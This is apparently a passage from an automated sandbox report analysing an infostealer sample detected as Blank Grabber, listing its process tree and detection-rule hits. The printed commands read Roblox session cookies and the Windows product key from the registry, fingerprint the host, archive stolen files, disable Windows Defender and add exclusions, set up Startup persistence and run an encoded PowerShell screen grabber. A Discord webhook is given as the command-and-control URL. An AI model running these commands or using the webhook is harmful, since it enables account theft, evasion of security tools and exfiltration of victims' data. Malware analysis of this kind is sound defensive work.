        • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 7936 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 6404 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7988 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 1448 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8008 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 5304 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 1180 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 3392 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 1940 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 3336 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5548 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7336 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7172 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 4620 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 4612 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1248 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7984 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 6168 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 628 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7212 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7036 cmdline: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 8028 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5352 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1592 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7956 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8132 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6404 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6392 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7948 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3408 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2376 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 4448 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2536 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
      • MpCmdRun.exe (PID: 7836 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
        • conhost.exe (PID: 2880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI78082\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1299449724.00000213D8524000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000000.00000003.1299449724.00000213D8522000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000002.00000003.1739009557.0000018C01A4F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 4 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sppawx.exe", ParentImage: C:\Users\user\Desktop\sppawx.exe, ParentProcessId: 7860, ParentProcessName: sppawx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'", ProcessId: 7924, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sppawx.exe", ParentImage: C:\Users\user\Desktop\sppawx.exe, ParentProcessId: 7860, ParentProcessName: sppawx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7932, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sppawx.exe", ParentImage: C:\Users\user\Desktop\sppawx.exe, ParentProcessId: 7860, ParentProcessName: sppawx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *", ProcessId: 7212, ProcessName: cmd.exe
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7956, StartAddress: FC9B32B0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7956
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\sppawx.exe, ProcessId: 7860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgA